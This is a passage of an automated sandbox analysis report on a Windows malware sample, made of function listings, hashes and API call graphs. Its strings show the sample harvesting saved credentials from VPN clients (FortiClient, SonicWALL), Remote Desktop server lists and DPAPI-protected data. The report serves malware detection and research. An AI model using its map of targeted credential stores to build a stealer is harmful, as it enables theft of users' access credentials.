                                                                                                                                        • Opcode ID: 152a2d5ca8424219c1645b7db4641ab7528640e05460c9e3818a3068e443641a
                                                                                                                                        • Instruction ID: 6aa6c2156328ae9b38fbac3ce3c2331c29c179d99ffb45331fdcfcb2f7255aae
                                                                                                                                        • Opcode Fuzzy Hash: 152a2d5ca8424219c1645b7db4641ab7528640e05460c9e3818a3068e443641a
                                                                                                                                        • Instruction Fuzzy Hash: CE31876260868345EB209B66E4905E97B50FB46BC8F404231DE6DC77D6FEBCD455CB10
                                                                                                                                        Function 00007FF6F2D6E3AC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AppendPathlstrcpy
                                                                                                                                        • String ID: ":"$"},$Software\Fortinet\FortiClient\Sslvpn\Tunnels
                                                                                                                                        • API String ID: 3043196718-4231764533
                                                                                                                                        • Opcode ID: 41717d2b28b12b861b56b77c4a305ba195c6b11fe973075c33dbed15fd8a1f2e
                                                                                                                                        • Instruction ID: 945540a0e8cd536f13c280ed015ed0af5335ec934827b5bd8c85cec59c015ce3
                                                                                                                                        • Opcode Fuzzy Hash: 41717d2b28b12b861b56b77c4a305ba195c6b11fe973075c33dbed15fd8a1f2e
                                                                                                                                        • Instruction Fuzzy Hash: 03318D72608A8181DB209F62E8442E97765FB89BC4F544232EE6D877D9EE7CD504CB10
                                                                                                                                        Function 00007FF6F2D61DE8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateValue
                                                                                                                                        • String ID: ?
                                                                                                                                        • API String ID: 1818849710-1684325040
                                                                                                                                        • Opcode ID: 95ba9ea116202154f80c3a303d626d01697fe8fb572a65aab9065d47d504427e
                                                                                                                                        • Instruction ID: 158b1072d104891cdb721a74c91cba4365e7a2fa3e9910707f7fbf3ec1a5b1d0
                                                                                                                                        • Opcode Fuzzy Hash: 95ba9ea116202154f80c3a303d626d01697fe8fb572a65aab9065d47d504427e
                                                                                                                                        • Instruction Fuzzy Hash: 8221C273A147808AE7208F75A8402ED7BA4FB5979CF540325EA9C43B99DF7CC144CB10
                                                                                                                                        Function 00007FF6F2D6E604 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapValue$AppendFreePathProcesslstrcpy
                                                                                                                                        • String ID: "},$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles
                                                                                                                                        • API String ID: 784796242-1893226844
                                                                                                                                        • Opcode ID: 56f71f68fbf130069fe557fb8e3a7c8bf433f458dc10dc9b1a9b8d1950a128cc
                                                                                                                                        • Instruction ID: a890e1dd8d8bdfac1875994142992bd849d6a2385e73b45eea40fba9f6bdf72e
                                                                                                                                        • Opcode Fuzzy Hash: 56f71f68fbf130069fe557fb8e3a7c8bf433f458dc10dc9b1a9b8d1950a128cc
                                                                                                                                        • Instruction Fuzzy Hash: B711211160858250DB20AB52F8953FA6755EF95BC8F445332E9BDCB7EAEEACD104CF10
                                                                                                                                        Function 00007FF6F2D6CBF4 Relevance: 6.1, APIs: 4, Instructions: 61registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Enum$CloseOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1701607978-0
                                                                                                                                        • Opcode ID: ef76d64d6cf8778b5dc3921a799c46b9aee72b0b08683383b909529c2558360e
                                                                                                                                        • Instruction ID: 318054070ce885c5c804598790a2ad53726c01c41097e5f41f1fb6ce055d316f
                                                                                                                                        • Opcode Fuzzy Hash: ef76d64d6cf8778b5dc3921a799c46b9aee72b0b08683383b909529c2558360e
                                                                                                                                        • Instruction Fuzzy Hash: D1218C33618B8582D3108F11E48476AB7B9F788B88F150236EB9C43B68DF7DD559CB00
                                                                                                                                        Function 00007FF6F2D678EC Relevance: 6.1, APIs: 4, Instructions: 56libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$AddressCurrentLibraryLoadProcWow64
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4035193891-0
                                                                                                                                        • Opcode ID: 8f7d0afc07ad77c62296da18ea9598441e0f30d9eecd5f53e8fc3d6832e69a3e
                                                                                                                                        • Instruction ID: 54ffae949bef6d201d2b23d3d54574bce34f7c9b24ad8c938e48876a4b491b95
                                                                                                                                        • Opcode Fuzzy Hash: 8f7d0afc07ad77c62296da18ea9598441e0f30d9eecd5f53e8fc3d6832e69a3e
                                                                                                                                        • Instruction Fuzzy Hash: 0421A4629187C587EB104F61A49527AAB90FB5D784F144335DAED46B86EFACD1048F10
                                                                                                                                        Function 00007FF6F2D6E4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value$AppendPathlstrcpy
                                                                                                                                        • String ID: Software\Microsoft\Terminal Server Client\Servers
                                                                                                                                        • API String ID: 19203174-1233151749
                                                                                                                                        • Opcode ID: 0d695f50cfbc54c939f23020370ed581918cd74b60817dfd48474a5e17f4269d
                                                                                                                                        • Instruction ID: bb8b5de2bade38a54623a1a77ac7b484651743d4ae80cd4a1efe7a2f28ae117b
                                                                                                                                        • Opcode Fuzzy Hash: 0d695f50cfbc54c939f23020370ed581918cd74b60817dfd48474a5e17f4269d
                                                                                                                                        • Instruction Fuzzy Hash: 9521B171618A8285DB20EF61D8542EE7755FB89BC8F444232EA6D8B7D9EE7CC604CF10
                                                                                                                                        Function 00007FF6F2D6FDE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetEnvironmentVariableW.KERNEL32 ref: 00007FF6F2D6FE11
                                                                                                                                        • lstrcatW.KERNEL32 ref: 00007FF6F2D6FE1E
                                                                                                                                          • Part of subcall function 00007FF6F2D6FF3C: lstrlenW.KERNEL32 ref: 00007FF6F2D6FF62
                                                                                                                                          • Part of subcall function 00007FF6F2D6FF3C: lstrlenW.KERNEL32 ref: 00007FF6F2D6FF7E
                                                                                                                                          • Part of subcall function 00007FF6F2D6FF3C: WideCharToMultiByte.KERNEL32 ref: 00007FF6F2D6FFA7
                                                                                                                                          • Part of subcall function 00007FF6F2D6FF3C: PathFileExistsA.SHLWAPI ref: 00007FF6F2D6FFB0
                                                                                                                                          • Part of subcall function 00007FF6F2D6FF3C: OpenFile.KERNEL32 ref: 00007FF6F2D6FFC9
                                                                                                                                          • Part of subcall function 00007FF6F2D6FF3C: GetFileSize.KERNEL32 ref: 00007FF6F2D6FFE9
                                                                                                                                          • Part of subcall function 00007FF6F2D6FF3C: CreateFileMappingA.KERNEL32 ref: 00007FF6F2D70020
                                                                                                                                          • Part of subcall function 00007FF6F2D6FF3C: MapViewOfFile.KERNEL32 ref: 00007FF6F2D70041
                                                                                                                                          • Part of subcall function 00007FF6F2D6FF3C: __memcpy.DELAYIMP ref: 00007FF6F2D70053
                                                                                                                                          • Part of subcall function 00007FF6F2D6FF3C: UnmapViewOfFile.KERNEL32 ref: 00007FF6F2D7005E
                                                                                                                                          • Part of subcall function 00007FF6F2D6FF3C: CloseHandle.KERNEL32 ref: 00007FF6F2D70067
                                                                                                                                          • Part of subcall function 00007FF6F2D6FF3C: CloseHandle.KERNEL32 ref: 00007FF6F2D70070
                                                                                                                                          • Part of subcall function 00007FF6F2D6F280: __memcpy.DELAYIMP ref: 00007FF6F2D6F29E
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: GetProcessHeap.KERNEL32 ref: 00007FF6F2D625C1
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: RtlFreeHeap.NTDLL ref: 00007FF6F2D625CF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcat
                                                                                                                                        • String ID: APPDATA
                                                                                                                                        • API String ID: 2395011915-4054820676
                                                                                                                                        • Opcode ID: cec1ab9afa3ae12122d372c36ef716b8056693dd0c9b4a40219edd8f34d93ed0
                                                                                                                                        • Instruction ID: 926aa1646ae5a1d4d74c6a747b00ac076e8f020b637d6841559ef78b06fd1af5
                                                                                                                                        • Opcode Fuzzy Hash: cec1ab9afa3ae12122d372c36ef716b8056693dd0c9b4a40219edd8f34d93ed0
                                                                                                                                        • Instruction Fuzzy Hash: A6118132728E4695EB10DB10E4845ED7770FB85788F845131EAAE87A99FFBCD508CB50

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:3.8%
                                                                                                                                        Dynamic/Decrypted Code Coverage:50.1%
                                                                                                                                        Signature Coverage:3.1%
                                                                                                                                        Total number of Nodes:802
                                                                                                                                        Total number of Limit Nodes:82
                                                                                                                                        execution_graph 29075 2776e71 21 API calls 29187 2776871 8 API calls 29076 2770670 _allmul _allmul _allmul _alldvrm 29188 27a507d 24 API calls 29189 276807c 23 API calls 29190 275b079 20 API calls 29078 2783e6b 20 API calls 29195 2754c6d 17 API calls 29196 276f86a 31 API calls 29197 2792864 25 API calls 28787 275105d VirtualFree 29200 2797452 19 API calls 29082 2755e5a 28 API calls 28997 2753c40 28998 2751b6a 2 API calls 28997->28998 28999 2753c50 28998->28999 29000 2753dfa 28999->29000 29033 2751000 GetProcessHeap RtlAllocateHeap 28999->29033 29002 2753c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 29003 27a4bec 89 API calls 29002->29003 29006 2753c9a 29003->29006 29004 2753dec DeleteFileW 29005 2751011 3 API calls 29004->29005 29005->29000 29006->29004 29007 2753de3 29006->29007 29034 2751000 GetProcessHeap RtlAllocateHeap 29006->29034 29009 27a3848 76 API calls 29007->29009 29009->29004 29010 2753cce 29011 27702ec 107 API calls 29010->29011 29025 2753cd9 29011->29025 29012 2753da8 29036 276fb92 93 API calls 29012->29036 29014 2753db1 lstrlen 29015 2753ddc 29014->29015 29016 2753db9 29014->29016 29018 2751011 3 API calls 29015->29018 29037 2751798 lstrlen 29016->29037 29018->29007 29019 2751fa7 19 API calls 29019->29025 29020 2753dc8 29038 2751798 lstrlen 29020->29038 29022 2753d2b lstrlen 29023 2753d35 lstrlen 29022->29023 29022->29025 29023->29025 29024 2753dd2 29039 2751798 lstrlen 29024->29039 29025->29012 29025->29019 29025->29022 29027 27702ec 107 API calls 29025->29027 29035 2751000 GetProcessHeap RtlAllocateHeap 29025->29035 29027->29025 29029 2753d46 wsprintfA lstrlen 29030 2753d71 29029->29030 29031 2753d83 lstrcat 29029->29031 29030->29031 29032 2751011 3 API calls 29031->29032 29032->29025 29033->29002 29034->29010 29035->29029 29036->29014 29037->29020 29038->29024 29039->29015 29201 2754440 24 API calls 29203 2776440 107 API calls 29084 27b9238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 28436 275f433 28437 275f445 28436->28437 28442 27623b9 28437->28442 28440 275f47c 28441 275f490 28440->28441 28450 275e206 58 API calls 28440->28450 28443 27623d3 28442->28443 28446 2762473 28442->28446 28448 2762431 28443->28448 28454 2763451 43 API calls 28443->28454 28446->28440 28447 276240f 28447->28448 28455 276235a 17 API calls 28447->28455 28448->28446 28451 27563f7 28448->28451 28450->28441 28456 275bafc 28451->28456 28452 2756400 28452->28446 28454->28447 28455->28448 28467 275b609 28456->28467 28458 275bb3f GetFileAttributesW 28460 275bb4b 28458->28460 28466 275bb14 28458->28466 28459 275bb1a 28459->28452 28462 275bb5b 28460->28462 28463 275bb7d 28460->28463 28461 275bb25 DeleteFileW 28461->28463 28461->28466 28470 275a1c6 18 API calls 28462->28470 28471 275a2aa 17 API calls 28463->28471 28466->28458 28466->28459 28466->28461 28466->28462 28472 275a08a 28467->28472 28469 275b60f 28469->28466 28470->28459 28471->28459 28473 275a0a4 28472->28473 28475 275a0aa 28473->28475 28476 2756a81 28473->28476 28475->28469 28477 2756a8f 28476->28477 28478 2756a95 memset 28477->28478 28479 2756aa4 28477->28479 28478->28479 28479->28475 29207 276943d 34 API calls 29212 278e024 93 API calls 29213 275482b 14 API calls 29217 275581f _alldiv _allrem _allmul 29094 277f21c 23 API calls 28992 2754406 28993 2752e30 22 API calls 28992->28993 28994 2754429 28993->28994 28995 2752e30 22 API calls 28994->28995 28996 275443a 28995->28996 29096 275ca01 _allmul _alldiv _allmul _alldiv 29222 2789000 28 API calls 29223 2795401 memset memcpy memcpy memset memcpy 29040 275a40e 29043 275a426 29040->29043 29049 275a4a2 29040->29049 29041 275a469 memcpy 29041->29049 29042 275a4cc ReadFile 29045 275a524 29042->29045 29042->29049 29043->29041 29044 275a44a memcpy 29043->29044 29043->29049 29052 275a45d 29044->29052 29054 275a2aa 17 API calls 29045->29054 29047 275a532 29048 275a53e memset 29047->29048 29047->29052 29048->29052 29049->29042 29049->29045 29050 275a501 29049->29050 29053 275a1c6 18 API calls 29050->29053 29053->29052 29054->29047 29098 2770e0c 22 API calls 29225 2754cf5 memset 28483 27528f8 28484 2752900 28483->28484 28485 2752ac8 28483->28485 28518 2751000 GetProcessHeap RtlAllocateHeap 28484->28518 28515 27a3848 28485->28515 28488 275290e 28519 27702ec 28488->28519 28490 2751011 3 API calls 28492 2752adf 28490->28492 28493 2752a8b 28537 276fb92 93 API calls 28493->28537 28495 2752a98 lstrlen 28496 2752aa4 28495->28496 28497 2752ac1 28495->28497 28538 2751798 lstrlen 28496->28538 28499 2751011 3 API calls 28497->28499 28499->28485 28500 2752ab1 28539 2751798 lstrlen 28500->28539 28502 2752ab9 28540 2751798 lstrlen 28502->28540 28504 2751fa7 19 API calls 28509 2752919 28504->28509 28505 27529da lstrlen 28506 27529eb lstrlen 28505->28506 28505->28509 28506->28509 28507 27702ec 107 API calls 28507->28509 28509->28493 28509->28504 28509->28505 28509->28507 28533 2751000 GetProcessHeap RtlAllocateHeap 28509->28533 28534 2752112 28509->28534 28511 2752a25 wsprintfA lstrlen 28512 2752a58 28511->28512 28513 2752a6a lstrcat 28511->28513 28512->28513 28514 2751011 3 API calls 28513->28514 28514->28509 28541 27a37cb 28515->28541 28518->28488 28557 276faee 28519->28557 28521 2770304 28522 2770308 28521->28522 28527 2770317 28521->28527 28564 27a4da0 17 API calls 28522->28564 28525 2770312 28525->28509 28527->28525 28528 2770362 28527->28528 28565 278ee2b 92 API calls 28527->28565 28566 276fbf2 93 API calls 28527->28566 28567 2770199 107 API calls 28527->28567 28568 276fd7b 19 API calls 28528->28568 28531 277036d 28531->28525 28569 2756c62 memcpy 28531->28569 28533->28509 28572 2751000 GetProcessHeap RtlAllocateHeap 28534->28572 28536 2752121 GetSystemTimeAsFileTime _alldiv wsprintfA 28536->28511 28537->28495 28538->28500 28539->28502 28540->28497 28542 2752ad1 DeleteFileW 28541->28542 28543 27a37d6 28541->28543 28542->28490 28553 27595b5 17 API calls 28543->28553 28545 27a37db 28546 27a37df 28545->28546 28549 27a37eb 28545->28549 28554 27a4da0 17 API calls 28546->28554 28548 27a3834 28556 27a3865 71 API calls 28548->28556 28549->28548 28551 27a381f 28549->28551 28555 2758795 22 API calls 28551->28555 28553->28545 28554->28542 28555->28542 28556->28542 28558 276fb06 28557->28558 28559 276faf3 28557->28559 28571 276fad1 17 API calls 28558->28571 28570 2757f70 17 API calls 28559->28570 28562 276faff 28562->28521 28563 276fb0b 28563->28521 28564->28525 28565->28527 28566->28527 28567->28527 28568->28531 28569->28525 28570->28562 28571->28563 28572->28536 29100 2789ef6 125 API calls 29227 275f4ec 20 API calls 28615 2759ee8 28616 2759ef1 RtlFreeHeap 28615->28616 28619 2759f1a 28615->28619 28617 2759f02 28616->28617 28616->28619 28620 2757f70 17 API calls 28617->28620 28620->28619 29230 27870de 24 API calls 29103 277c6da 23 API calls 29233 27a34ca 57 API calls 29234 2755cc5 22 API calls 29236 2756eb7 22 API calls 29237 2765cca 32 API calls 29108 277faca _allmul strcspn 28192 2752cb5 28193 2752cbe 28192->28193 28221 2751953 28193->28221 28195 2752cc3 28196 2752e17 28195->28196 28197 2751953 6 API calls 28195->28197 28198 2752cd9 28197->28198 28226 2751000 GetProcessHeap RtlAllocateHeap 28198->28226 28200 2752ce9 28227 2751000 GetProcessHeap RtlAllocateHeap 28200->28227 28202 2752cf9 28228 2751b6a 28202->28228 28204 2752d04 28205 2752d0c GetPrivateProfileSectionNamesW 28204->28205 28206 2752ded 28204->28206 28205->28206 28207 2752d22 28205->28207 28208 2751011 3 API calls 28206->28208 28207->28206 28211 2752d3f StrStrIW 28207->28211 28213 2752dd7 lstrlenW 28207->28213 28219 2751953 6 API calls 28207->28219 28234 2751011 28207->28234 28209 2752e02 28208->28209 28210 2751011 3 API calls 28209->28210 28212 2752e09 28210->28212 28211->28213 28214 2752d53 GetPrivateProfileStringW 28211->28214 28215 2751011 3 API calls 28212->28215 28213->28206 28213->28207 28214->28213 28216 2752d72 GetPrivateProfileIntW 28214->28216 28217 2752e10 28215->28217 28216->28207 28218 2751011 3 API calls 28217->28218 28218->28196 28219->28207 28223 2751964 lstrlenW lstrlenW 28221->28223 28239 2751000 GetProcessHeap RtlAllocateHeap 28223->28239 28225 2751986 lstrcatW lstrcatW 28225->28195 28226->28200 28227->28202 28229 2751b6f 28228->28229 28230 2751b99 28228->28230 28229->28230 28231 2751b76 CreateFileW 28229->28231 28230->28204 28232 2751b95 28231->28232 28233 2751b8d CloseHandle 28231->28233 28232->28204 28233->28232 28240 2751162 VirtualQuery 28234->28240 28237 275102d 28237->28207 28238 275101d GetProcessHeap RtlFreeHeap 28238->28237 28239->28225 28241 2751019 28240->28241 28241->28237 28241->28238 29239 27548b1 22 API calls 29240 2756eb7 24 API calls 29111 27596bc _alldiv _alldiv _alldiv _alldiv _allmul 29113 27712bb _allmul _allmul _allmul _alldvrm _allmul 29242 27678b9 33 API calls 28589 2752ea5 25 API calls 29243 276b8a6 90 API calls 28590 27524a4 28593 2752198 RtlZeroMemory GetVersionExW 28590->28593 28594 27521cb LoadLibraryW 28593->28594 28596 27521fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28594->28596 28597 275249b 28594->28597 28598 2752492 FreeLibrary 28596->28598 28606 2752244 28596->28606 28598->28597 28599 275247b 28599->28598 28600 2752365 RtlCompareMemory 28600->28606 28601 27522e1 RtlCompareMemory 28601->28606 28602 2751953 6 API calls 28602->28606 28603 2751011 GetProcessHeap RtlFreeHeap VirtualQuery 28603->28606 28604 27523f8 StrStrIW 28604->28606 28605 27517c0 9 API calls 28605->28606 28606->28598 28606->28599 28606->28600 28606->28601 28606->28602 28606->28603 28606->28604 28606->28605 29244 2777ca6 19 API calls 28610 2759ea7 RtlAllocateHeap 28611 2759ec1 28610->28611 28612 2759ed9 28610->28612 28614 2757f70 17 API calls 28611->28614 28614->28612 29116 27556a2 _allrem 29245 276b0aa 84 API calls 29249 2792c9e 115 API calls 28960 2753098 28961 2751b6a 2 API calls 28960->28961 28963 27530af 28961->28963 28962 27533a9 28963->28962 28984 2751000 GetProcessHeap RtlAllocateHeap 28963->28984 28965 27530ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28966 27a4bec 89 API calls 28965->28966 28969 2753126 28966->28969 28967 275339b DeleteFileW 28968 2751011 3 API calls 28967->28968 28968->28962 28969->28967 28970 2753392 28969->28970 28971 27702ec 107 API calls 28969->28971 28972 27a3848 76 API calls 28970->28972 28981 2753155 28971->28981 28972->28967 28973 2753381 28986 276fb92 93 API calls 28973->28986 28975 27532cd CryptUnprotectData 28975->28981 28976 275319c RtlCompareMemory 28976->28975 28976->28981 28977 27702ec 107 API calls 28977->28981 28978 27531d0 RtlZeroMemory 28985 2751000 GetProcessHeap RtlAllocateHeap 28978->28985 28980 2751fa7 19 API calls 28980->28981 28981->28973 28981->28975 28981->28976 28981->28977 28981->28978 28981->28980 28982 2751011 3 API calls 28981->28982 28983 2751798 lstrlen 28981->28983 28982->28981 28983->28981 28984->28965 28985->28981 28986->28970 29123 2766698 30 API calls 29124 275629a 23 API calls 29126 2760284 39 API calls 29253 279348f 27 API calls 28242 2752f77 28247 2752e30 StrStrIW 28242->28247 28245 2752e30 22 API calls 28246 2752fab 28245->28246 28248 2752e57 28247->28248 28249 2752ebc 28247->28249 28279 27519e5 28248->28279 28273 2751000 GetProcessHeap RtlAllocateHeap 28249->28273 28253 2752ed0 RegOpenKeyExW 28254 2752f68 28253->28254 28265 2752eee 28253->28265 28255 2751011 3 API calls 28254->28255 28259 2752f6f 28255->28259 28257 2752f50 RegEnumKeyExW 28258 2752f5e RegCloseKey 28257->28258 28257->28265 28258->28254 28259->28245 28260 2752e75 28261 2752eb5 28260->28261 28294 2751afe 28260->28294 28263 2751011 3 API calls 28261->28263 28262 2751953 6 API calls 28262->28265 28263->28249 28265->28257 28265->28262 28270 2752e30 18 API calls 28265->28270 28272 2751011 3 API calls 28265->28272 28274 275199d 28265->28274 28268 2751011 3 API calls 28268->28261 28269 275199d 9 API calls 28271 2752e91 28269->28271 28270->28265 28271->28268 28272->28265 28273->28253 28275 2751953 6 API calls 28274->28275 28276 27519a6 28275->28276 28277 2751011 3 API calls 28276->28277 28278 27519af 28277->28278 28278->28265 28280 27519f7 28279->28280 28281 27519fa RegOpenKeyExW 28279->28281 28280->28281 28282 2751aa2 28281->28282 28283 2751a28 RegQueryValueExW 28281->28283 28286 2751ab9 28282->28286 28287 27519e5 5 API calls 28282->28287 28284 2751a94 RegCloseKey 28283->28284 28285 2751a46 28283->28285 28284->28282 28284->28286 28285->28284 28302 2751000 GetProcessHeap RtlAllocateHeap 28285->28302 28286->28249 28293 2751bc5 10 API calls 28286->28293 28287->28286 28289 2751a61 RegQueryValueExW 28290 2751a7f 28289->28290 28291 2751a8b 28289->28291 28290->28284 28292 2751011 3 API calls 28291->28292 28292->28290 28293->28260 28303 2751000 GetProcessHeap RtlAllocateHeap 28294->28303 28296 2751b0d SHGetFolderPathW 28297 2751b63 28296->28297 28298 2751b20 28296->28298 28297->28269 28297->28271 28299 2751011 3 API calls 28298->28299 28301 2751b28 28299->28301 28300 27519e5 9 API calls 28300->28301 28301->28297 28301->28300 28302->28289 28303->28296 28304 2754177 28307 2754045 28304->28307 28326 2753fdc 28307->28326 28310 2753fdc 50 API calls 28311 275407a 28310->28311 28312 2753fdc 50 API calls 28311->28312 28313 275408d 28312->28313 28314 2753fdc 50 API calls 28313->28314 28315 27540a0 28314->28315 28316 2753fdc 50 API calls 28315->28316 28317 27540b3 28316->28317 28318 2753fdc 50 API calls 28317->28318 28319 27540c6 28318->28319 28320 2753fdc 50 API calls 28319->28320 28321 27540d9 28320->28321 28322 2753fdc 50 API calls 28321->28322 28323 27540ec 28322->28323 28324 2753fdc 50 API calls 28323->28324 28325 27540ff 28324->28325 28327 2751afe 10 API calls 28326->28327 28328 2753fea 28327->28328 28329 275403f 28328->28329 28330 275199d 9 API calls 28328->28330 28329->28310 28331 2753ff8 28330->28331 28337 2753ed9 28331->28337 28334 2754038 28336 2751011 3 API calls 28334->28336 28336->28329 28338 2753fd1 28337->28338 28339 2753eed 28337->28339 28338->28334 28359 2751d4a 28338->28359 28339->28338 28387 2751000 GetProcessHeap RtlAllocateHeap 28339->28387 28341 2753f01 PathCombineW FindFirstFileW 28342 2753f27 28341->28342 28343 2753fca 28341->28343 28344 